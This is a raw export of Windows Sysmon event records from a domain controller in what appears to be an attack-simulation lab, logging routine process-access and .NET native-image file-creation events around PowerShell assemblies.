21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.836{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C8-60D3-9603-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:08.805{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1C8-60D3-9603-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.805{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C8-60D3-9603-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 
23542300x800000000000000020555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.695{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=161908922E0175A92A1DD7B9F5396FF1,SHA256=3378628E4DE2E4D3B98351FB8EFE4192A3BC3EE547CBF70E04846D02E0455CE2,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:08.508{4DB9351A-A1C5-60D3-9503-00000000CF01}6356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18d4-0\Microsoft.PowerShell.Commands.Utility.dll2021-06-23 21:04:08.508 10341000x800000000000000020595Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:09.477{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C9-60D3-9903-00000000CF01}1420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020594Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:09.461{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1C9-60D3-9903-00000000CF01}1420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020593Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:09.461{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C9-60D3-9903-00000000CF01}1420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020592Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:09.398{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C9-60D3-9803-00000000CF01}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020591Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:09.383{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C9-60D3-9803-00000000CF01}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020590Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:09.383{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C9-60D3-9803-00000000CF01}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020589Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:09.352{4DB9351A-A1C8-60D3-9703-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1be4-0\Microsoft.PowerShell.ConsoleHost.dll2021-06-23 21:04:09.352 10341000x800000000000000020588Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:08.992{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C8-60D3-9703-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.993{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CA-60D3-9C03-00000000CF01}1176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:10.978{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1CA-60D3-9C03-00000000CF01}1176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.978{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CA-60D3-9C03-00000000CF01}1176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 
11241100x800000000000000020605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:10.947{4DB9351A-A1CA-60D3-9B03-00000000CF01}6416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1910-0\Microsoft.PowerShell.Diagnostics.Activities.dll2021-06-23 21:04:10.947 10341000x800000000000000020604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.618{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CA-60D3-9B03-00000000CF01}6416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.603{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1CA-60D3-9B03-00000000CF01}6416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
